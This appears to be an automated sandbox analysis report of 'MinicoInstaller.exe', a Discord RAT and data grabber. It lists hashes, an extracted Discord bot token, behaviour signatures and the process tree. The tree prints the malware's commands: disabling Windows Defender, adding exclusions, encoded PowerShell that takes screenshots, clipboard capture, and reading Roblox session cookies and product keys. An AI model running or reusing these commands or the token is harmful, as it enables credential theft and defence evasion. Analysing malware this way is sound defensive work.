Analysis

  • max time kernel
    95s
  • max time network
    135s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    22-02-2025 00:44

General

  • Target

    MinicoInstaller.exe

  • Size

    7.6MB

  • MD5

    efc16c463c8b66799da69dadbd7a8124

  • SHA1

    500670a66e445c8d3a467e14efde7991824b9ff2

  • SHA256

    15f679670aade72a91e3d0596b334441402453e29d4e4f0af509967799bc6ee2

  • SHA512

    927eb8421f66a85b7bb8041c5a1bbf2973b96f958cfa59a5ecb89ecd528cc5d91468eef3983976611a28da860f92295066dc4e377f8851fa83daab5f543df6e5

  • SSDEEP

    196608:+trnrL9SPYoGavO2KaH/K1QFcG1cpRHneRNB3SuN1G/s:+BnrL9SrGan5H/KEupxU3VN1

Malware Config

Extracted

Family

discordrat

Attributes
  • discord_token

    MTMzOTYyNDY0NTA5MDg3MzM5Ng.GSLke3.if1DF-bdxVyPF9XjyqM9CkH6lrVfd1LG6rrc0o

  • server_id

    1339657624517349500

Signatures

  • Discord RAT

    A RAT written in C# using Discord as a C2.

  • Discordrat family
  • Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

    Using powershell.exe command.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 4 IoCs
  • Loads dropped DLL 16 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 3 IoCs
  • UPX packed file 56 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 2 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\MinicoInstaller.exe
    "C:\Users\Admin\AppData\Local\Temp\MinicoInstaller.exe"
    1⤵
    • Checks computer location settings
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:4964
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGoAeABrACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGsAZABwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHEAdwBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHgAYwBhACMAPgA="
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2804
    • C:\Windows\MyRatBuilder(rename).exe
      "C:\Windows\MyRatBuilder(rename).exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4460
    • C:\Windows\MyGrabberBuilt(rename).exe
      "C:\Windows\MyGrabberBuilt(rename).exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of WriteProcessMemory
      PID:3920
      • C:\Windows\MyGrabberBuilt(rename).exe
        "C:\Windows\MyGrabberBuilt(rename).exe"
        3⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3852
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\MyGrabberBuilt(rename).exe'"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:2412
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows\MyGrabberBuilt(rename).exe'
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:4028
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:464
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
            5⤵
            • Command and Scripting Interpreter: PowerShell
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:3596
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Message', 0, 'a', 0+16);close()""
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1276
          • C:\Windows\system32\mshta.exe
            mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Message', 0, 'a', 0+16);close()"
            5⤵
              PID:3908
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3712
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              5⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:3308
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3628
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              5⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:1692
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:3276
            • C:\Windows\System32\Wbem\WMIC.exe
              WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
              5⤵
              • Suspicious use of AdjustPrivilegeToken
              PID:4588
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
            4⤵
            • Clipboard Data
            • Suspicious use of WriteProcessMemory
            PID:4776
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell Get-Clipboard
              5⤵
              • Clipboard Data
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:2292
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:2776
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              5⤵
              • Enumerates processes with tasklist
              • Suspicious use of AdjustPrivilegeToken
              PID:1484
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tree /A /F"
            4⤵
            • Suspicious use of WriteProcessMemory
            PID:1140
            • C:\Windows\system32\tree.com
              tree /A /F
              5⤵
                PID:4956
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "systeminfo"
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:868
              • C:\Windows\system32\systeminfo.exe
                systeminfo
                5⤵
                • Gathers system information
                PID:1856
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2328
              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                5⤵
                • Suspicious behavior: EnumeratesProcesses
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:3624
                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ozftguw1\ozftguw1.cmdline"
                  6⤵
                    PID:3188
                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9913.tmp" "c:\Users\Admin\AppData\Local\Temp\ozftguw1\CSCC9A4C691E133443F9BBC79994AAE5E65.TMP"
                      7⤵
                        PID:3452
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3424
                  • C:\Windows\system32\tree.com
                    tree /A /F
                    5⤵
                      PID:2616
                  • C:\Windows\system32\cmd.exe
                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3492
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      5⤵
                        PID:2576
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "tree /A /F"
                      4⤵
                        PID:4856
                        • C:\Windows\system32\tree.com
                          tree /A /F
                          5⤵
                            PID:4472
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                          4⤵
                            PID:4124
                            • C:\Windows\system32\tree.com
                              tree /A /F
                              5⤵
                                PID:940
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                              4⤵
                                PID:1996
                                • C:\Windows\System32\Conhost.exe
                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  5⤵
                                    PID:4588
                                  • C:\Windows\system32\tree.com
                                    tree /A /F
                                    5⤵
                                      PID:1132
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                    4⤵
                                      PID:4776
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                        5⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4400
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                      4⤵
                                        PID:2128
                                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                          powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                          5⤵
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:1164
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "getmac"
                                        4⤵
                                          PID:3472
                                          • C:\Windows\system32\getmac.exe
                                            getmac
                                            5⤵
                                              PID:2772
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI39202\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\5nlmH.zip" *"
                                            4⤵
                                              PID:1772
                                              • C:\Users\Admin\AppData\Local\Temp\_MEI39202\rar.exe
                                                C:\Users\Admin\AppData\Local\Temp\_MEI39202\rar.exe a -r -hp"123" "C:\Users\Admin\AppData\Local\Temp\5nlmH.zip" *
                                                5⤵
                                                • Executes dropped EXE
                                                PID:3748
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                              4⤵
                                                PID:2412
                                                • C:\Windows\System32\Wbem\WMIC.exe
                                                  wmic os get Caption
                                                  5⤵
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:1016
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
                                                4⤵
                                                  PID:2900
                                                  • C:\Windows\System32\Wbem\WMIC.exe
                                                    wmic computersystem get totalphysicalmemory
                                                    5⤵
                                                      PID:2636
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
                                                    4⤵
                                                      PID:4912
                                                      • C:\Windows\System32\Wbem\WMIC.exe
                                                        wmic csproduct get uuid
                                                        5⤵
                                                          PID:4988
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
                                                        4⤵
                                                          PID:1784
                                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
                                                            5⤵
                                                            • Command and Scripting Interpreter: PowerShell
                                                            • Suspicious behavior: EnumeratesProcesses
                                                            PID:5048
                                                        • C:\Windows\system32\cmd.exe
                                                          C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                          4⤵
                                                            PID:1348
                                                            • C:\Windows\System32\Wbem\WMIC.exe
                                                              wmic path win32_VideoController get name
                                                              5⤵
                                                              • Detects videocard installed
                                                              PID:380
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
                                                            4⤵
                                                              PID:3504
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
                                                                5⤵
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:3948

                                                      Network

                                                      MITRE ATT&CK Enterprise v15

                                                      Replay Monitor

                                                      Loading Replay Monitor...

                                                      Downloads

                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

                                                        Filesize

                                                        3KB

                                                        MD5

                                                        8740e7db6a0d290c198447b1f16d5281

                                                        SHA1

                                                        ab54460bb918f4af8a651317c8b53a8f6bfb70cd

                                                        SHA256

                                                        f45b0efc0833020dfeeaad0adc8ed10b0f85e0bc491baf9e1a4da089636bccf5

                                                        SHA512

                                                        d91fe9666c4923c8e90e5a785db96e5613b8cb3bf28983296a2f381ccdcd73d15254268548e156c8150a9a531712602313ba65f74cec5784341c8d66b088750b

                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                        Filesize

                                                        1KB

